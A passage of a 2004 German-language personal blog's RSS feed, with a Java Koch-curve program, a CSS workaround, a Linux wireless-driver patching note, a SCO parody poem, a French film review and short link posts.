  11007.         * @param  g      Graphik-Objekt, auf dem gezeichnet wird
  11008.         * @param  depth  Rekursionstiefe
  11009.         * @param  x1     X-Koordinate des ersten Punktes
  11010.         * @param  y1     Y-Koordinate des ersten Punktes
  11011.         * @param  x2     X-Koordinate des zweiten Punktes
  11012.         * @param  y2     X-Koordinate des zweiten Punktes
  11013.         */
  11014.        public void koch( Graphics g, int depth, double x1, double y1, double x2,
  11015.                        double y2 ) {
  11016.                double  x13  = x1 + ( x2 - x1 ) / 3.0;
  11017.                double  x23  = x1 + 2.0 * ( x2 - x1 ) / 3.0;
  11018.  
  11019.                double  y13  = y1 + ( y2 - y1 ) / 3.0;
  11020.                double  y23  = y1 + 2.0 * ( y2 - y1 ) / 3.0;
  11021.  
  11022.                double  xd   = ( x23 - x13 ) * Math.cos( -Math.PI / 3 ) -
  11023.                                ( y23 - y13 ) * Math.sin( -Math.PI / 3 ) + x13;
  11024.                double  yd   = ( x23 - x13 ) * Math.sin( -Math.PI / 3 ) +
  11025.                                ( y23 - y13 ) * Math.cos( -Math.PI / 3 ) + y13;
  11026.  
  11027.                if ( depth > 0 ) {
  11028.                        koch( g, depth - 1, x1, y1, x13, y13 );
  11029.                        koch( g, depth - 1, x13, y13, xd, yd );
  11030.                        koch( g, depth - 1, xd, yd, x23, y23 );
  11031.                        koch( g, depth - 1, x23, y23, x2, y2 );
  11032.                } else {
  11033.                        g.drawLine( (int) x1, (int) y1, (int) x2, (int) y2 );
  11034.                }
  11035.        }
  11036.  
  11037.  
  11038.        /**
  11039.         *  The main program for the KochscheKurve class
  11040.         *
  11041.         * @param  args  The command line arguments
  11042.         */
  11043.        public static void main( String[] args ) {
  11044.                KochscheKurve  graf  = new KochscheKurve();
  11045.  
  11046.                graf.setVisible( true );
  11047.  
  11048.                graf.addWindowListener(
  11049.                        new WindowAdapter() {
  11050.                                public void windowClosing( WindowEvent e ) {
  11051.                                        System.exit( 0 );
  11052.                                }
  11053.                        }
  11054.                                 );
  11055.  
  11056.        }
  11057.  
  11058. }
  11059. </pre>
  11060. ]]></description>
  11061.    <content:encoded><![CDATA[<p>Heute haben wir im <abbr title="A general purpose, high-level, object-oriented, cross-platform programming language developed by Sun Microsystems">Java</abbr>-Programmieren mit <abbr title="Graphical User Interface">GUI</abbr>-Programmierung angefangen. Die Exercices waren simpel (Buttons erzeugen, ausrichten etc.), jedoch hatte es als Zusatzaufgabe noch die <a href="https://web.archive.org/web/20040815192152/http://cowww.epfl.ch/proginfo/TP/gra1/serie3_files/Koch.htm" title="Beschreibung auf französisch (archive.org)">Kochsche Kurve</a>.</p><p><img src="https://blog.x-way.org/images/kochschekurve.png" width="422" height="472" alt="Kochsche Kurve"></p>
  11062. <br><br>
  11063. <pre>import java.awt.*;
  11064. import java.awt.event.*;
  11065. import javax.swing.*;
  11066.  
  11067. /**
  11068. *  Kochsche Kurve
  11069. *
  11070. * @author     Andreas Jaggi
  11071. * @created    26. März 2004
  11072. * @version    1.0
  11073. */
  11074.  
  11075. public class KochscheKurve
  11076.                 extends JFrame {
  11077.        /**
  11078.         *  Constructor for the KochscheKurve object
  11079.         */
  11080.        public KochscheKurve() {
  11081.                setSize( 600, 600 );
  11082.                setTitle( "Die Kochsche Kurve" );
  11083.        }
  11084.  
  11085.  
  11086.        /**
  11087.         *  Überladene "interne" Methode, die aufgerufen wird, wenn das Fenster neu
  11088.         *  gezeichnet werden muss
  11089.         *
  11090.         * @param  g  Graphik-Objekt, auf dem gezeichnet wird
  11091.         */
  11092.        public void paint( Graphics g ) {
  11093.                super.paint( g );
  11094.  
  11095.                double  x1;
  11096.                double  x2;
  11097.                double  x3;
  11098.                double  y1;
  11099.                double  y2;
  11100.                double  y3;
  11101.                int     depth  = 13;
  11102.  
  11103.                x1 = 100;
  11104.                y1 = 400;
  11105.                x2 = 500;
  11106.                y2 = 400;
  11107.                x3 = ( x2 - x1 ) * Math.cos( -Math.PI / 3 ) -
  11108.                                ( y2 - y1 ) * Math.sin( -Math.PI / 3 ) + x1;
  11109.                y3 = ( x2 - x1 ) * Math.sin( -Math.PI / 3 ) +
  11110.                                ( y2 - y1 ) * Math.cos( -Math.PI / 3 ) + y1;
  11111.  
  11112.                koch( g, depth, x2, y2, x1, y1 );
  11113.                koch( g, depth, x1, y1, x3, y3 );
  11114.                koch( g, depth, x3, y3, x2, y2 );
  11115.        }
  11116.  
  11117.  
  11118.        /**
  11119.         *  Rekursive Funktion, welche den Fraktal zwischen zwei Punkten bis zu einer
  11120.         *  bestimmten Tiefe zeichnet.
  11121.         *
  11122.         * @param  g      Graphik-Objekt, auf dem gezeichnet wird
  11123.         * @param  depth  Rekursionstiefe
  11124.         * @param  x1     X-Koordinate des ersten Punktes
  11125.         * @param  y1     Y-Koordinate des ersten Punktes
  11126.         * @param  x2     X-Koordinate des zweiten Punktes
  11127.         * @param  y2     X-Koordinate des zweiten Punktes
  11128.         */
  11129.        public void koch( Graphics g, int depth, double x1, double y1, double x2,
  11130.                        double y2 ) {
  11131.                double  x13  = x1 + ( x2 - x1 ) / 3.0;
  11132.                double  x23  = x1 + 2.0 * ( x2 - x1 ) / 3.0;
  11133.  
  11134.                double  y13  = y1 + ( y2 - y1 ) / 3.0;
  11135.                double  y23  = y1 + 2.0 * ( y2 - y1 ) / 3.0;
  11136.  
  11137.                double  xd   = ( x23 - x13 ) * Math.cos( -Math.PI / 3 ) -
  11138.                                ( y23 - y13 ) * Math.sin( -Math.PI / 3 ) + x13;
  11139.                double  yd   = ( x23 - x13 ) * Math.sin( -Math.PI / 3 ) +
  11140.                                ( y23 - y13 ) * Math.cos( -Math.PI / 3 ) + y13;
  11141.  
  11142.                if ( depth > 0 ) {
  11143.                        koch( g, depth - 1, x1, y1, x13, y13 );
  11144.                        koch( g, depth - 1, x13, y13, xd, yd );
  11145.                        koch( g, depth - 1, xd, yd, x23, y23 );
  11146.                        koch( g, depth - 1, x23, y23, x2, y2 );
  11147.                } else {
  11148.                        g.drawLine( (int) x1, (int) y1, (int) x2, (int) y2 );
  11149.                }
  11150.        }
  11151.  
  11152.  
  11153.        /**
  11154.         *  The main program for the KochscheKurve class
  11155.         *
  11156.         * @param  args  The command line arguments
  11157.         */
  11158.        public static void main( String[] args ) {
  11159.                KochscheKurve  graf  = new KochscheKurve();
  11160.  
  11161.                graf.setVisible( true );
  11162.  
  11163.                graf.addWindowListener(
  11164.                        new WindowAdapter() {
  11165.                                public void windowClosing( WindowEvent e ) {
  11166.                                        System.exit( 0 );
  11167.                                }
  11168.                        }
  11169.                                 );
  11170.  
  11171.        }
  11172.  
  11173. }
  11174. </pre>
  11175. ]]></content:encoded>
  11176.  </item>
  11177.  
  11178.  <item>
  11179.    <title>Rechnen mit CSS</title>
  11180.    <link>https://blog.x-way.org/Webdesign/2004/03/14/Rechnen_mit_CSS.html</link>
  11181.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324013</guid>
  11182.    <dc:creator>Andreas Jaggi</dc:creator>
  11183.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11184.    <pubDate>Sun, 14 Mar 2004 12:43:22 +0000</pubDate>
  11185.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  11186.    <description><![CDATA[<p>Im Stylesheet dieser Seite findet sich unter anderem folgende Styledefinition:</p><pre>#rechts li a {
  11187. display: block;
  11188. border-bottom: 1px solid #FFFFFF;
  11189. width: 100% - 30px;
  11190. padding-left: 30px;
  11191. }</pre><p>Diese macht, dass die Links im rechten Submenu auf der ganzen Breite funktionieren und nicht nur wenn man auf den Text klickt.<br>Zuerst hatte ich die Weite auf 100% gesetzt. Jedoch hat der Mozilla wegen der 30px Padding noch 30px ausserhalb des Rahmens angezeigt. Mit overflow: hidden habe ich versucht das Problem zu lösen. Jedoch hat das nicht funktioniert, da es ja kein eigentlicher overflow ist.<br>Schlussendlich bin ich durch ausprobieren von garantiert fehlerhaften Styledefinitionen auf die jetztige Lösung gekommen. Natürlich validiert das nun nicht mehr als korrektes CSS, aber es funktioniert :-)</p><p>Da ich nun keine Windows-Maschine mehr habe, wäre ich froh um Screenshots vom Submenu, wenn mit der Maus über ein Link gefahren wird (a:hover).</p>
  11192. ]]></description>
  11193.    <content:encoded><![CDATA[<p>Im Stylesheet dieser Seite findet sich unter anderem folgende Styledefinition:</p><pre>#rechts li a {
  11194. display: block;
  11195. border-bottom: 1px solid #FFFFFF;
  11196. width: 100% - 30px;
  11197. padding-left: 30px;
  11198. }</pre><p>Diese macht, dass die Links im rechten Submenu auf der ganzen Breite funktionieren und nicht nur wenn man auf den Text klickt.<br>Zuerst hatte ich die Weite auf 100% gesetzt. Jedoch hat der Mozilla wegen der 30px Padding noch 30px ausserhalb des Rahmens angezeigt. Mit overflow: hidden habe ich versucht das Problem zu lösen. Jedoch hat das nicht funktioniert, da es ja kein eigentlicher overflow ist.<br>Schlussendlich bin ich durch ausprobieren von garantiert fehlerhaften Styledefinitionen auf die jetztige Lösung gekommen. Natürlich validiert das nun nicht mehr als korrektes CSS, aber es funktioniert :-)</p><p>Da ich nun keine Windows-Maschine mehr habe, wäre ich froh um Screenshots vom Submenu, wenn mit der Maus über ein Link gefahren wird (a:hover).</p>
  11199. ]]></content:encoded>
  11200.  </item>
  11201.  
  11202.  <item>
  11203.    <title>125. Geburtstag von Albert Einstein</title>
  11204.    <link>https://blog.x-way.org/Misc/2004/03/14/125_Geburtstag_von_Albert_Einstein.html</link>
  11205.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324012</guid>
  11206.    <dc:creator>Andreas Jaggi</dc:creator>
  11207.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11208.    <pubDate>Sun, 14 Mar 2004 12:16:49 +0000</pubDate>
  11209.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  11210.    <description><![CDATA[<blockquote><p>&quot;Phantasie ist wichtiger als Wissen. Wissen ist begrenzt, Phantasie aber umfaßt die ganze Welt.&quot;</p><p>Albert Einstein (1879-1955)</p></blockquote>
  11211. <p>Mehr dazu bei <a href="http://heise.de/newsticker/meldung/45520" title="Relativität, Schnüffler und Würfel -- zum 125. Geburtstag von Albert Einstein">heise</a></p>
  11212. ]]></description>
  11213.    <content:encoded><![CDATA[<blockquote><p>&quot;Phantasie ist wichtiger als Wissen. Wissen ist begrenzt, Phantasie aber umfaßt die ganze Welt.&quot;</p><p>Albert Einstein (1879-1955)</p></blockquote>
  11214. <p>Mehr dazu bei <a href="http://heise.de/newsticker/meldung/45520" title="Relativität, Schnüffler und Würfel -- zum 125. Geburtstag von Albert Einstein">heise</a></p>
  11215. ]]></content:encoded>
  11216.  </item>
  11217.  
  11218.  <item>
  11219.    <title>x-log, trashed again</title>
  11220.    <link>https://blog.x-way.org/Misc/2004/03/14/x-log_trashed_again.html</link>
  11221.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324011</guid>
  11222.    <dc:creator>Andreas Jaggi</dc:creator>
  11223.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11224.    <pubDate>Sun, 14 Mar 2004 00:00:00 +0000</pubDate>
  11225.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  11226.    <description><![CDATA[<blockquote><p>&quot;Am liebsten erinnere ich mich an die Zukunft.&quot;</p><p>Salvador Dalí (1904-1989), span. surrealist. Maler</p></blockquote>
  11227. <p>Wie schon angekündigt, habe ich während den Semesterferien die <abbr title="PHP Hypertext Preprocessor">PHP</abbr>-Scripts, welche hier im Hintergrund ihre Arbeit tun, neu geschrieben. Bisher sind noch nicht alle Funktionen der alten Version implementiert. Es werden jedoch laufend neue Funktionen hinzugefügt.<br>Mit dem alten Script verschwinden auch die alten Layouts, da hier nun ein neues Template-System werkelt. Aber keine Angst es werden neue Layouts kommen, denn dieser graue Kasten gefällt mir schon jetzt nicht mehr.</p>
  11228. ]]></description>
  11229.    <content:encoded><![CDATA[<blockquote><p>&quot;Am liebsten erinnere ich mich an die Zukunft.&quot;</p><p>Salvador Dalí (1904-1989), span. surrealist. Maler</p></blockquote>
  11230. <p>Wie schon angekündigt, habe ich während den Semesterferien die <abbr title="PHP Hypertext Preprocessor">PHP</abbr>-Scripts, welche hier im Hintergrund ihre Arbeit tun, neu geschrieben. Bisher sind noch nicht alle Funktionen der alten Version implementiert. Es werden jedoch laufend neue Funktionen hinzugefügt.<br>Mit dem alten Script verschwinden auch die alten Layouts, da hier nun ein neues Template-System werkelt. Aber keine Angst es werden neue Layouts kommen, denn dieser graue Kasten gefällt mir schon jetzt nicht mehr.</p>
  11231. ]]></content:encoded>
  11232.  </item>
  11233.  
  11234.  <item>
  11235.    <title>PHP Literatur</title>
  11236.    <link>https://blog.x-way.org/Coding/2004/02/29/PHP_Literatur.html</link>
  11237.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324009</guid>
  11238.    <dc:creator>Andreas Jaggi</dc:creator>
  11239.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11240.    <pubDate>Sun, 29 Feb 2004 20:47:00 +0000</pubDate>
  11241.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  11242.    <description><![CDATA[Schon nur weil ich am heutigen Datum erst wieder in 4 Jahren was schreiben kann, muss dieser Eintrag hier sein ;-)<br>Aber auch weil ich durch die Lektüre folgender Artikel zu einem Rewrite (ja, from Scratch) von meinem Weblog motiviert worden bin. Insbesondere hat mich der Artikel über Template Engines beeindruck, da hier mit einer völlig anderen Ansicht an das Problem herangegangen wird, als ich es bisher getan habe. An dieser Stelle wäre es natürlich interessant zu wissen wie andere Leute ihre Templates handhaben.<br><br><a href="https://web.archive.org/web/20040405022004/http://revjim.net/item/3956/" title="how to write better code (archive.org)"><b>how to write better code</b></a><br><a href="https://web.archive.org/web/20040203074914/http://laughingmeme.org/archives/001055.html" title="A Few Tips for Writing Useful Libraries in PHP (archive.org)"><b>A Few Tips for Writing Useful Libraries in PHP</b></a><br><a href="http://www.massassi.com/php/articles/template_engines/" title="Template Engines"><b>Template Engines</b></a><br><a href="https://web.archive.org/web/20040415155551/http://www.mojofat.com/tutorial/index.html" title="Functional Spec Tutorial - What and Why (archive.org)"><b>Functional Specification Tutorial</b></a>
  11243. ]]></description>
  11244.    <content:encoded><![CDATA[Schon nur weil ich am heutigen Datum erst wieder in 4 Jahren was schreiben kann, muss dieser Eintrag hier sein ;-)<br>Aber auch weil ich durch die Lektüre folgender Artikel zu einem Rewrite (ja, from Scratch) von meinem Weblog motiviert worden bin. Insbesondere hat mich der Artikel über Template Engines beeindruck, da hier mit einer völlig anderen Ansicht an das Problem herangegangen wird, als ich es bisher getan habe. An dieser Stelle wäre es natürlich interessant zu wissen wie andere Leute ihre Templates handhaben.<br><br><a href="https://web.archive.org/web/20040405022004/http://revjim.net/item/3956/" title="how to write better code (archive.org)"><b>how to write better code</b></a><br><a href="https://web.archive.org/web/20040203074914/http://laughingmeme.org/archives/001055.html" title="A Few Tips for Writing Useful Libraries in PHP (archive.org)"><b>A Few Tips for Writing Useful Libraries in PHP</b></a><br><a href="http://www.massassi.com/php/articles/template_engines/" title="Template Engines"><b>Template Engines</b></a><br><a href="https://web.archive.org/web/20040415155551/http://www.mojofat.com/tutorial/index.html" title="Functional Spec Tutorial - What and Why (archive.org)"><b>Functional Specification Tutorial</b></a>
  11245. ]]></content:encoded>
  11246.  </item>
  11247.  
  11248.  <item>
  11249.    <title>Pinguinfunk</title>
  11250.    <link>https://blog.x-way.org/Linux/2004/02/23/Pinguinfunk.html</link>
  11251.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324008</guid>
  11252.    <dc:creator>Andreas Jaggi</dc:creator>
  11253.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11254.    <pubDate>Mon, 23 Feb 2004 16:08:00 +0000</pubDate>
  11255.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  11256.    <description><![CDATA[Da es für die im PowerBook eingebaute Airport Extreme WLAN-Karte (Broadcom) keine Linuxtreiber gibt, habe ich vor ein paar Wochen eine <a href="https://www.netgear.com/support/product/ma401" title="MA401 | Product | Support | NETGEAR"><b>Netgear MA401RA</b></a> günstig erworben (ist ein Auslaufmodell). Für diese hat es im Kernel selbst Treiber.<br><br>Um <a href="http://pcmcia-cs.sourceforge.net/" title="PCMCIA mit Linux"><b>PCMCIA</b></a> aufm PowerBook zum Laufen zu bringen benötigte es eine spezielle <a href="https://blog.x-way.org/stuff/config.opts" title="config.opts herunterladen"><b>config.opts</b></a>. Nun funktioniert die drahtlose Verbindung problemlos. Jedoch unterstützen die Treiber des Kernels den <a href="https://web.archive.org/web/20040401210309/http://airsnort.shmoo.com/orinocoinfo.html" title="Link zur Orinoco-Monitor-Seite (archive.org)"><b>Monitor-Modus</b></a> nicht, welcher für Spielereien wie <a href="http://www.kismetwireless.net/" title="802.11 layer2 wireless network detector, sniffer, and intrusion detection system"><b>Kismet</b></a>, <a href="https://wellenreiter.sourceforge.net/" title="wireless network discovery and auditing tool"><b>wellenreiter</b></a> etc. benötigt wird. Um diesen Modus nützen zu können müssen zuerst die Treiber <a href="https://blog.x-way.org/stuff/orinoco-0.13e-2.6.2-patch.diff" title="den Patch herunterladen"><b>gepatcht</b></a> werden (der Patch funktioniert partiel auch für 2.6.1 und 2.6.3 Kernel).<br>Dazu einfach den Patch ins Verzeichnis /usr/src/linux/drivers/net/wireless/ kopieren und dort folgenden Befehl ausführen: patch -p4 &lt; orinoco-0.13e-2.6.2-patch.diff<br><br>Dummerweise schneits draussen und ich bin erkältet, so dass ich nicht <a href="http://wardriving.ch/" title="wardriving.ch"><b>spielen</b></a> gehen kann :-(
  11257. ]]></description>
  11258.    <content:encoded><![CDATA[Da es für die im PowerBook eingebaute Airport Extreme WLAN-Karte (Broadcom) keine Linuxtreiber gibt, habe ich vor ein paar Wochen eine <a href="https://www.netgear.com/support/product/ma401" title="MA401 | Product | Support | NETGEAR"><b>Netgear MA401RA</b></a> günstig erworben (ist ein Auslaufmodell). Für diese hat es im Kernel selbst Treiber.<br><br>Um <a href="http://pcmcia-cs.sourceforge.net/" title="PCMCIA mit Linux"><b>PCMCIA</b></a> aufm PowerBook zum Laufen zu bringen benötigte es eine spezielle <a href="https://blog.x-way.org/stuff/config.opts" title="config.opts herunterladen"><b>config.opts</b></a>. Nun funktioniert die drahtlose Verbindung problemlos. Jedoch unterstützen die Treiber des Kernels den <a href="https://web.archive.org/web/20040401210309/http://airsnort.shmoo.com/orinocoinfo.html" title="Link zur Orinoco-Monitor-Seite (archive.org)"><b>Monitor-Modus</b></a> nicht, welcher für Spielereien wie <a href="http://www.kismetwireless.net/" title="802.11 layer2 wireless network detector, sniffer, and intrusion detection system"><b>Kismet</b></a>, <a href="https://wellenreiter.sourceforge.net/" title="wireless network discovery and auditing tool"><b>wellenreiter</b></a> etc. benötigt wird. Um diesen Modus nützen zu können müssen zuerst die Treiber <a href="https://blog.x-way.org/stuff/orinoco-0.13e-2.6.2-patch.diff" title="den Patch herunterladen"><b>gepatcht</b></a> werden (der Patch funktioniert partiel auch für 2.6.1 und 2.6.3 Kernel).<br>Dazu einfach den Patch ins Verzeichnis /usr/src/linux/drivers/net/wireless/ kopieren und dort folgenden Befehl ausführen: patch -p4 &lt; orinoco-0.13e-2.6.2-patch.diff<br><br>Dummerweise schneits draussen und ich bin erkältet, so dass ich nicht <a href="http://wardriving.ch/" title="wardriving.ch"><b>spielen</b></a> gehen kann :-(
  11259. ]]></content:encoded>
  11260.  </item>
  11261.  
  11262.  <item>
  11263.    <title>Sco vs. Linux</title>
  11264.    <link>https://blog.x-way.org/Linux/2004/02/21/Sco_vs_Linux.html</link>
  11265.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324007</guid>
  11266.    <dc:creator>Andreas Jaggi</dc:creator>
  11267.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11268.    <pubDate>Sat, 21 Feb 2004 19:00:00 +0000</pubDate>
  11269.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  11270.    <description><![CDATA[Zehn kleine UNIX Zeilen<br>
  11271. Reicht man ein zur Klage.<br>
  11272. Die eine die auf griechisch war,<br>
  11273. War leider viel zu vage.<br>
  11274. <br>
  11275. Neun kleine UNIX Zeilen<br>
  11276. Sollten es begründen.<br>
  11277. Die eine war trotz größter Müh'<br>
  11278. In LINUX nicht zu finden.<br>
  11279. <br>
  11280. Acht kleine UNIX Zeilen<br>
  11281. Dienten zum Beweise.<br>
  11282. Die eine war aus BSD,<br>
  11283. Pech für Anwalt Heise.<br>
  11284. <br>
  11285. Sieben kleine UNIX Zeilen,<br>
  11286. Kamen vor Gericht.<br>
  11287. Die eine war 'ne Fehlernummer,<br>
  11288. Die taugte dazu nicht.<br>
  11289. <br>
  11290. Sechs kleine UNIX Zeilen,<br>
  11291. Sollten es belegen.<br>
  11292. Doch eine kam zur GPL<br>
  11293. Durch SCO Kollegen.<br>
  11294. <br>
  11295. Fünf kleine UNIX Zeilen<br>
  11296. Waren noch dabei.<br>
  11297. Die eine kam von einem Band<br>
  11298. Mit Aufschrift System Drei.<br>
  11299. <br>
  11300. Vier kleine UNIX Zeilen,<br>
  11301. Doch eine, sonderbar,<br>
  11302. Gehörte nicht zum dem Programm,<br>
  11303. Sie war ein Kommentar.<br>
  11304. <br>
  11305. Drei Kleine UNIX Zeilen,<br>
  11306. Waren das Problem.<br>
  11307. Eine war zwar System Five,<br>
  11308. Doch kam von IBM.<br>
  11309. <br>
  11310. Zwei kleine UNIX Zeilen,<br>
  11311. Waren noch geblieben.<br>
  11312. Die eine war schon reichlich alt<br>
  11313. Und kam von System Sieben.<br>
  11314. <br>
  11315. Eine kleine UNIX Zeile<br>
  11316. Wurde angeführt.<br>
  11317. Die hatte Linus Torvalds selbst<br>
  11318. Am Anfang programmiert.<br>
  11319. <br>
  11320. Ohne eine UNIX Zeile<br>
  11321. Kann SCO nichts machen.<br>
  11322. Doch eines muss man zugestehn:<br>
  11323. Wir hatten was zu lachen.<br>
  11324. <br>
  11325. Schlussbemerkung:<br>
  11326. Hier zeigt sehr schön ein Kinderlied,<br>
  11327. Warum McBride die Wahrheit mied.<br>
  11328. <br>
  11329. <br>
  11330. Ausm <a href="http://www.heise.de/newsticker/foren/go.shtml?read=1&amp;msg_id=5143681&amp;forum_id=53189"><b>heise online-Leserforum</b></a> via <a href="http://vowe.net/"><b>vowe.net</b></a>
  11331. ]]></description>
  11332.    <content:encoded><![CDATA[Zehn kleine UNIX Zeilen<br>
  11333. Reicht man ein zur Klage.<br>
  11334. Die eine die auf griechisch war,<br>
  11335. War leider viel zu vage.<br>
  11336. <br>
  11337. Neun kleine UNIX Zeilen<br>
  11338. Sollten es begründen.<br>
  11339. Die eine war trotz größter Müh'<br>
  11340. In LINUX nicht zu finden.<br>
  11341. <br>
  11342. Acht kleine UNIX Zeilen<br>
  11343. Dienten zum Beweise.<br>
  11344. Die eine war aus BSD,<br>
  11345. Pech für Anwalt Heise.<br>
  11346. <br>
  11347. Sieben kleine UNIX Zeilen,<br>
  11348. Kamen vor Gericht.<br>
  11349. Die eine war 'ne Fehlernummer,<br>
  11350. Die taugte dazu nicht.<br>
  11351. <br>
  11352. Sechs kleine UNIX Zeilen,<br>
  11353. Sollten es belegen.<br>
  11354. Doch eine kam zur GPL<br>
  11355. Durch SCO Kollegen.<br>
  11356. <br>
  11357. Fünf kleine UNIX Zeilen<br>
  11358. Waren noch dabei.<br>
  11359. Die eine kam von einem Band<br>
  11360. Mit Aufschrift System Drei.<br>
  11361. <br>
  11362. Vier kleine UNIX Zeilen,<br>
  11363. Doch eine, sonderbar,<br>
  11364. Gehörte nicht zum dem Programm,<br>
  11365. Sie war ein Kommentar.<br>
  11366. <br>
  11367. Drei Kleine UNIX Zeilen,<br>
  11368. Waren das Problem.<br>
  11369. Eine war zwar System Five,<br>
  11370. Doch kam von IBM.<br>
  11371. <br>
  11372. Zwei kleine UNIX Zeilen,<br>
  11373. Waren noch geblieben.<br>
  11374. Die eine war schon reichlich alt<br>
  11375. Und kam von System Sieben.<br>
  11376. <br>
  11377. Eine kleine UNIX Zeile<br>
  11378. Wurde angeführt.<br>
  11379. Die hatte Linus Torvalds selbst<br>
  11380. Am Anfang programmiert.<br>
  11381. <br>
  11382. Ohne eine UNIX Zeile<br>
  11383. Kann SCO nichts machen.<br>
  11384. Doch eines muss man zugestehn:<br>
  11385. Wir hatten was zu lachen.<br>
  11386. <br>
  11387. Schlussbemerkung:<br>
  11388. Hier zeigt sehr schön ein Kinderlied,<br>
  11389. Warum McBride die Wahrheit mied.<br>
  11390. <br>
  11391. <br>
  11392. Ausm <a href="http://www.heise.de/newsticker/foren/go.shtml?read=1&amp;msg_id=5143681&amp;forum_id=53189"><b>heise online-Leserforum</b></a> via <a href="http://vowe.net/"><b>vowe.net</b></a>
  11393. ]]></content:encoded>
  11394.  </item>
  11395.  
  11396.  <item>
  11397.    <title>Les Rivières pourpres 2 - les anges de l'apocalypse</title>
  11398.    <link>https://blog.x-way.org/Cinema/2004/02/21/Les_Rivieres_pourpres_2_-_les_anges_de_lapocalypse.html</link>
  11399.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324006</guid>
  11400.    <dc:creator>Andreas Jaggi</dc:creator>
  11401.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11402.    <pubDate>Sat, 21 Feb 2004 17:02:00 +0000</pubDate>
  11403.    <category domain="https://blog.x-way.org/Cinema">Cinema</category>
  11404.    <description><![CDATA[Dans les stations du métro de Paris il y a partout des affiches pour <a href="http://www.allocine.fr/film/fichefilm_gen_cfilm=47703.html"><b>"Les Rivières pourpres 2"</b></a>. Alors j'ai suivi cettes affiches et je suis aller regarder le film le mercredi soir dans un cinéma située à <a href="https://web.archive.org/web/20040405052654/http://www.allocine.fr/cinema/visite.html?ID=C0159"><b>"les halles"</b></a>.<br><br><a href="http://www.allocine.fr/personne/fichepersonne_gen_cpersonne=20836.html"><b>Olivier Dahan</b></a> a créé le film en utilisant beaucoup de lumière colorée qui produit une ambiance spéciale. De plus le film me plait beaucoup car <a href="http://www.allocine.fr/personne/fichepersonne_gen_cpersonne=1659.html"><b>Jean Reno</b></a> y joue le rôle d'un commissaire.
  11405. ]]></description>
  11406.    <content:encoded><![CDATA[Dans les stations du métro de Paris il y a partout des affiches pour <a href="http://www.allocine.fr/film/fichefilm_gen_cfilm=47703.html"><b>"Les Rivières pourpres 2"</b></a>. Alors j'ai suivi cettes affiches et je suis aller regarder le film le mercredi soir dans un cinéma située à <a href="https://web.archive.org/web/20040405052654/http://www.allocine.fr/cinema/visite.html?ID=C0159"><b>"les halles"</b></a>.<br><br><a href="http://www.allocine.fr/personne/fichepersonne_gen_cpersonne=20836.html"><b>Olivier Dahan</b></a> a créé le film en utilisant beaucoup de lumière colorée qui produit une ambiance spéciale. De plus le film me plait beaucoup car <a href="http://www.allocine.fr/personne/fichepersonne_gen_cpersonne=1659.html"><b>Jean Reno</b></a> y joue le rôle d'un commissaire.
  11407. ]]></content:encoded>
  11408.  </item>
  11409.  
  11410.  <item>
  11411.    <title>T minus 16560s</title>
  11412.    <link>https://blog.x-way.org/Misc/2004/02/16/T_minus_16560s.html</link>
  11413.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324005</guid>
  11414.    <dc:creator>Andreas Jaggi</dc:creator>
  11415.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11416.    <pubDate>Mon, 16 Feb 2004 01:24:00 +0000</pubDate>
  11417.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  11418.    <description><![CDATA[<a href="http://paris.fr/" title="Paris"><b>Paris</b></a>
  11419. ]]></description>
  11420.    <content:encoded><![CDATA[<a href="http://paris.fr/" title="Paris"><b>Paris</b></a>
  11421. ]]></content:encoded>
  11422.  </item>
  11423.  
  11424.  <item>
  11425.    <title>sutfym</title>
  11426.    <link>https://blog.x-way.org/Misc/2004/02/11/sutfym.html</link>
  11427.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324004</guid>
  11428.    <dc:creator>Andreas Jaggi</dc:creator>
  11429.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11430.    <pubDate>Wed, 11 Feb 2004 01:11:00 +0000</pubDate>
  11431.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  11432.    <description><![CDATA[<img src="https://blog.x-way.org/images/joda-stfu.jpg" width="420" height="444" alt="shut up the fuck. you must"><br><br>Via <a href="https://web.archive.org/web/20040609102039/http://guy.galez.org/"><b>Galez Guy of the Day</b></a>
  11433. ]]></description>
  11434.    <content:encoded><![CDATA[<img src="https://blog.x-way.org/images/joda-stfu.jpg" width="420" height="444" alt="shut up the fuck. you must"><br><br>Via <a href="https://web.archive.org/web/20040609102039/http://guy.galez.org/"><b>Galez Guy of the Day</b></a>
  11435. ]]></content:encoded>
  11436.  </item>
  11437.  
  11438.  <item>
  11439.    <title>Pröbelei</title>
  11440.    <link>https://blog.x-way.org/School/2004/02/03/Proebelei.html</link>
  11441.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324003</guid>
  11442.    <dc:creator>Andreas Jaggi</dc:creator>
  11443.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11444.    <pubDate>Tue, 03 Feb 2004 17:03:00 +0000</pubDate>
